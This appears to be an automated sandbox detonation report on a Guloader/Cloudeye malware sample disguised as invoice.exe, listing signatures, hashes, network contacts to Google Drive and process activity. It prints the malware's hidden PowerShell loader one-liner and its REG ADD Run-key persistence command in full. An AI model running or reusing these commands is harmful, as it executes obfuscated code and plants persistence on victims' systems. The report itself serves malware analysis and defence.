Analysis Overview
SHA256
2926ff4aaaf732eb191704ec4b0b5081c9046b1a08ccf3871b14e7600e07d34c
Threat Level: Known bad
The file invoice.exe was found to be: Known bad.
Malicious Activity Summary
Guloader,Cloudeye
Command and Scripting Interpreter: PowerShell
Loads dropped DLL
Adds Run key to start application
Legitimate hosting services abused for malware hosting/C2
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
Suspicious use of NtCreateThreadExHideFromDebugger
Unsigned PE
Enumerates physical storage devices
NSIS installer
Suspicious behavior: MapViewOfSection
Modifies registry key
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-07-09 11:28
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
NSIS installer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-07-09 11:28
Reported
2024-07-09 11:34
Platform
win7-20240705-en
Max time kernel
316s
Max time network
317s
Command Line
Signatures
Guloader,Cloudeye
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\invoice.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\invoice.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\invoice.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Observerbare86.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000\Software\Microsoft\Windows\CurrentVersion\Run\Udmund = "%Internality% -windowstyle minimized $Skibsfart=(Get-ItemProperty -Path 'HKCU:\\Backlash\\').Preseparated;%Internality% ($Skibsfart)" | C:\Windows\SysWOW64\reg.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Observerbare86.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Observerbare86.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Observerbare86.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2320 set thread context of 1988 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\Observerbare86.exe |
Enumerates physical storage devices
NSIS installer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\invoice.exe
"C:\Users\Admin\AppData\Local\Temp\invoice.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -windowstyle hidden "$Udlbstidspunkter=Get-Content 'C:\Users\Admin\AppData\Local\Temp\Servicebureauet\aloe\collinsia\Handelsstandsforeningernes.Toi';$Subdelegate=$Udlbstidspunkter.SubString(69683,3);.$Subdelegate($Udlbstidspunkter)"
C:\Users\Admin\AppData\Local\Temp\Observerbare86.exe
"C:\Users\Admin\AppData\Local\Temp\Observerbare86.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Udmund" /t REG_EXPAND_SZ /d "%Internality% -windowstyle minimized $Skibsfart=(Get-ItemProperty -Path 'HKCU:\Backlash\').Preseparated;%Internality% ($Skibsfart)"
C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Udmund" /t REG_EXPAND_SZ /d "%Internality% -windowstyle minimized $Skibsfart=(Get-ItemProperty -Path 'HKCU:\Backlash\').Preseparated;%Internality% ($Skibsfart)"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | drive.google.com | udp |
| GB | 172.217.16.238:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 216.58.201.99:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | o.pki.goog | udp |
| GB | 216.58.201.99:80 | o.pki.goog | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 216.58.201.97:443 | drive.usercontent.google.com | tcp |
Files
C:\Users\Admin\Desktop\Flyverdragter.lnk
| MD5 | e1f9e012d6a177b9fdb259de551c2db4 |
| SHA1 | 65609a0c4740e3ccc5f5510b55c9006c576840ac |
| SHA256 | 6463f0514d8119de8e60b44bdabe90004c2399ace020d426becbf427a6144a0c |
| SHA512 | a222d0b78e80d9402ebf1560e5fb5995f3a3d674c7144a5494cf7fa3352654c9d187a522587208e903c06fcf3de404e3e8fc31ffed92fa0c4aa749586a63f668 |
\Users\Admin\AppData\Local\Temp\nsj5024.tmp\nsExec.dll
| MD5 | b648c78981c02c434d6a04d4422a6198 |
| SHA1 | 74d99eed1eae76c7f43454c01cdb7030e5772fc2 |
| SHA256 | 3e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9 |
| SHA512 | 219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2 |
\Users\Admin\AppData\Local\Temp\nsj5024.tmp\BgImage.dll
| MD5 | 350a507070ed063ac6a511aeef67861a |
| SHA1 | cf647b90a1212e090f1d236d1b50a5010cbf3bae |
| SHA256 | 5c66abd3f06eaa357ed9663224c927cf7120dca010572103faa88832bb31c5ab |
| SHA512 | cde5747cc8539625e4262afad9699ce4e8325133d7ed7f47b9d46989a7aa0d2cc2488441acc57368f485ef1dd3e02b9ef2faa642f68e9f1db53a39e0f896d468 |
\Users\Admin\AppData\Local\Temp\nsj5024.tmp\nsDialogs.dll
| MD5 | 13b6a88cf284d0f45619e76191e2b995 |
| SHA1 | 09ebb0eb4b1dca73d354368414906fc5ad667e06 |
| SHA256 | cb958e21c3935ef7697a2f14d64cae0f9264c91a92d2deeb821ba58852dac911 |
| SHA512 | 2aeeae709d759e34592d8a06c90e58aa747e14d54be95fb133994fdcebb1bdc8bc5d82782d0c8c3cdfd35c7bea5d7105379d3c3a25377a8c958c7b2555b1209e |
memory/2320-181-0x0000000073881000-0x0000000073882000-memory.dmp
memory/2320-182-0x0000000073880000-0x0000000073E2B000-memory.dmp
memory/2320-185-0x0000000073880000-0x0000000073E2B000-memory.dmp
memory/2320-184-0x0000000073880000-0x0000000073E2B000-memory.dmp
memory/2320-183-0x0000000073880000-0x0000000073E2B000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Servicebureauet\aloe\collinsia\Handelsstandsforeningernes.Toi
| MD5 | 9f369129a14ef6d8d0867ec4d9b6eb19 |
| SHA1 | 2a56ca0fb0b4590c030d293a7829ac087212821b |
| SHA256 | 9f288ab07bf267422b4670dfd87f373115682a026e63db13e9bab44977c8cc0f |
| SHA512 | d8fd8aeabfa1bd47f0d3ca2208ac9154496d9b38ef6b185a3c9bf26877539f57a5b0e022c02ae2121a68f74ab13f45f446124dc6d8d90020defd1abeb2825326 |
memory/2320-188-0x0000000073880000-0x0000000073E2B000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Servicebureauet\aloe\collinsia\Typehuses.Ver
| MD5 | edd82166d9af4f94ca8413254ad27eee |
| SHA1 | cbe26db0839f63fc825205293f32660e8fa4b63c |
| SHA256 | b1246b2938bd2fa73f3a6679ea5040697db9a6ace3607fd2f20c5db2eeecc907 |
| SHA512 | 7f25fac516c23cdddfbf8f22e3f29e23c599ceacdfcf5d84531535e7838114bc982bef629ab219c7a17bcbc9ac97f159642297da7e2c1d8fa8d921917986fae8 |
memory/2320-190-0x0000000073880000-0x0000000073E2B000-memory.dmp
memory/2320-191-0x0000000006610000-0x000000000751B000-memory.dmp
\Users\Admin\AppData\Local\Temp\Observerbare86.exe
| MD5 | 5cb973edda7244515c1ddf1f532b67bc |
| SHA1 | e03200f1949f4c85379cb31d2d61165794efb481 |
| SHA256 | 2926ff4aaaf732eb191704ec4b0b5081c9046b1a08ccf3871b14e7600e07d34c |
| SHA512 | 220f5d5b8677de13495525bc825e048f25dbd9fe829f37e31a64f5ee72cf62945a1d71456a4438f96cd58496289f3cbccb2d7a3ee7fbe1c75e0ee15c93bad9ed |
memory/2320-196-0x0000000073880000-0x0000000073E2B000-memory.dmp
memory/1988-197-0x0000000000450000-0x00000000014B2000-memory.dmp
memory/1988-219-0x00000000014C0000-0x00000000023CB000-memory.dmp